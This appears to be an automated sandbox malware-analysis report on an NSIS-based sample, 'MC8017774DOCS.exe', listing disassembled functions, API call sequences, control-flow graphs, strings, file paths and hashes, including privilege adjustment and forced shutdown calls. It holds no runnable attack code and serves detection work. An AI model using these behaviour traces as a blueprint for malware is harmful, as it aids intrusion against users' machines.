                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                    • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403701
                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                                                                                    • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\MC8017774DOCS.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004038A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MC8017774DOCS.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                    • API String ID: 3441113951-4081784568
                                                                                                                                                    • Opcode ID: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                                    • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                                                                                    • Opcode Fuzzy Hash: d8beda2cf6d53e1c23663c7b3f0cac31a10eecbcac031cdf32090e7074c6eb08
                                                                                                                                                    • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E
                                                                                                                                                    Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 139 404c7b-404cc7 GetDlgItem * 2 140 404ee8-404eef 139->140 141 404ccd-404d61 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 404ef1-404f01 140->142 143 404f03 140->143 144 404d70-404d77 DeleteObject 141->144 145 404d63-404d6e SendMessageW 141->145 146 404f06-404f0f 142->146 143->146 147 404d79-404d81 144->147 145->144 148 404f11-404f14 146->148 149 404f1a-404f20 146->149 150 404d83-404d86 147->150 151 404daa-404dae 147->151 148->149 155 404ffe-405005 148->155 152 404f22-404f29 149->152 153 404f2f-404f36 149->153 156 404d88 150->156 157 404d8b-404da8 call 4062b9 SendMessageW * 2 150->157 151->147 154 404db0-404ddc call 40420e * 2 151->154 152->153 152->155 159 404f38-404f3b 153->159 160 404fab-404fae 153->160 195 404de2-404de8 154->195 196 404ea7-404eba GetWindowLongW SetWindowLongW 154->196 162 405076-40507e 155->162 163 405007-40500d 155->163 156->157 157->151 168 404f46-404f5b call 404bc9 159->168 169 404f3d-404f44 159->169 160->155 164 404fb0-404fba 160->164 166 405080-405086 SendMessageW 162->166 167 405088-40508f 162->167 171 405013-40501d 163->171 172 40525e-405270 call 404275 163->172 174 404fca-404fd4 164->174 175 404fbc-404fc8 SendMessageW 164->175 166->167 176 405091-405098 167->176 177 4050c3-4050ca 167->177 168->160 194 404f5d-404f6e 168->194 169->160 169->168 171->172 180 405023-405032 SendMessageW 171->180 174->155 182 404fd6-404fe0 174->182 175->174 183 4050a1-4050a8 176->183 184 40509a-40509b ImageList_Destroy 176->184 187 405220-405227 177->187 188 4050d0-4050dc call 4011ef 177->188 180->172 189 405038-405049 SendMessageW 180->189 190 404ff1-404ffb 182->190 191 404fe2-404fef 182->191 192 4050b1-4050bd 183->192 193 4050aa-4050ab GlobalFree 183->193 184->183 187->172 200 405229-405230 187->200 213 4050ec-4050ef 188->213 214 4050de-4050e1 188->214 198 405053-405055 189->198 199 40504b-405051 189->199 190->155 191->155 192->177 193->192 194->160 202 404f70-404f72 194->202 203 404deb-404df2 195->203 201 404ec0-404ec4 196->201 205 405056-40506f call 401299 SendMessageW 198->205 199->198 199->205 200->172 206 405232-40525c ShowWindow GetDlgItem ShowWindow 200->206 207 404ec6-404ed9 ShowWindow call 404243 201->207 208 404ede-404ee6 call 404243 201->208 209 404f74-404f7b 202->209 210 404f85 202->210 211 404e88-404e9b 203->211 212 404df8-404e20 203->212 205->162 206->172 207->172 208->140 222 404f81-404f83 209->222 223 404f7d-404f7f 209->223 226 404f88-404fa4 call 40117d 210->226 211->203 217 404ea1-404ea5 211->217 224 404e22-404e58 SendMessageW 212->224 225 404e5a-404e5c 212->225 218 405130-405154 call 4011ef 213->218 219 4050f1-40510a call 4012e2 call 401299 213->219 227 4050e3 214->227 228 4050e4-4050e7 call 404c49 214->228 217->196 217->201 241 4051f6-40520a InvalidateRect 218->241 242 40515a 218->242 249 40511a-405129 SendMessageW 219->249 250 40510c-405112 219->250 222->226 223->226 224->211 229 404e5e-404e6d SendMessageW 225->229 230 404e6f-404e85 SendMessageW 225->230 226->160 227->228 228->213 229->211 230->211 241->187 244 40520c-40521b call 404b9c call 404b84 241->244 245 40515d-405168 242->245 244->187 246 40516a-405179 245->246 247 4051de-4051f0 245->247 251 40517b-405188 246->251 252 40518c-40518f 246->252 247->241 247->245 249->218 253 405114 250->253 254 405115-405118 250->254 251->252 256 405191-405194 252->256 257 405196-40519f 252->257 253->254 254->249 254->250 259 4051a4-4051dc SendMessageW * 2 256->259 257->259 260 4051a1 257->260 259->247 260->259
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                    • String ID: $M$N
                                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                                    • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                                    • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                                                                                    • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                                    • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                                                                                    Function 6E9B1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E9B121B: GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E9B1C6F
                                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 6E9B1CB7
                                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 6E9B1CC1
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B1CD4
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B1DB6
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B1DBB
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B1DC0
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B1FAA
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 6E9B2144
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 6E9B21B9
                                                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 6E9B21CA
                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 6E9B2224
                                                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 6E9B223E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 245916457-0
                                                                                                                                                    • Opcode ID: 48dd54245d09a4261c868223c1183d0a1939ced8ba81105c79a7dd243f45b097
                                                                                                                                                    • Instruction ID: 2e7f43ae767abc3c8d87de518d181ce09957a8e2d580d06b0c6018ac38037ad4
                                                                                                                                                    • Opcode Fuzzy Hash: 48dd54245d09a4261c868223c1183d0a1939ced8ba81105c79a7dd243f45b097
                                                                                                                                                    • Instruction Fuzzy Hash: AD228671C2460ADEDB54CFEAC8946EBB7B8FF46305F10492AD1A5E3280D774DA898F50
                                                                                                                                                    Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 719 4059a9-4059cf call 405c74 722 4059d1-4059e3 DeleteFileW 719->722 723 4059e8-4059ef 719->723 724 405b65-405b69 722->724 725 4059f1-4059f3 723->725 726 405a02-405a12 call 406297 723->726 728 405b13-405b18 725->728 729 4059f9-4059fc 725->729 732 405a21-405a22 call 405bb8 726->732 733 405a14-405a1f lstrcatW 726->733 728->724 731 405b1a-405b1d 728->731 729->726 729->728 734 405b27-405b2f call 4065da 731->734 735 405b1f-405b25 731->735 736 405a27-405a2b 732->736 733->736 734->724 743 405b31-405b45 call 405b6c call 405961 734->743 735->724 739 405a37-405a3d lstrcatW 736->739 740 405a2d-405a35 736->740 742 405a42-405a5e lstrlenW FindFirstFileW 739->742 740->739 740->742 744 405a64-405a6c 742->744 745 405b08-405b0c 742->745 759 405b47-405b4a 743->759 760 405b5d-405b60 call 4052ff 743->760 748 405a8c-405aa0 call 406297 744->748 749 405a6e-405a76 744->749 745->728 747 405b0e 745->747 747->728 761 405aa2-405aaa 748->761 762 405ab7-405ac2 call 405961 748->762 751 405a78-405a80 749->751 752 405aeb-405afb FindNextFileW 749->752 751->748 757 405a82-405a8a 751->757 752->744 756 405b01-405b02 FindClose 752->756 756->745 757->748 757->752 759->735 763 405b4c-405b5b call 4052ff call 40605d 759->763 760->724 761->752 764 405aac-405ab5 call 4059a9 761->764 772 405ae3-405ae6 call 4052ff 762->772 773 405ac4-405ac7 762->773 763->724 764->752 772->752 776 405ac9-405ad9 call 4052ff call 40605d 773->776 777 405adb-405ae1 773->777 776->752 777->752
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 004059D2
                                                                                                                                                    • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A1A
                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A3D
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A43
                                                                                                                                                    • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A53
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                    • API String ID: 2035342205-398219656
                                                                                                                                                    • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                                    • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                                                                                    • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                                    • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                                                                                                    Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1077 4065da-4065ee FindFirstFileW 1078 4065f0-4065f9 FindClose 1077->1078 1079 4065fb 1077->1079 1080 4065fd-4065fe 1078->1080 1079->1080
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                                                                                    Strings
                                                                                                                                                    • pOz, xrefs: 004065DB
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nse865B.tmp, xrefs: 004065DA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp$pOz
                                                                                                                                                    • API String ID: 2295610775-830374354
                                                                                                                                                    • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                    • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                                                                                    • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                    • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                                                                                    Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
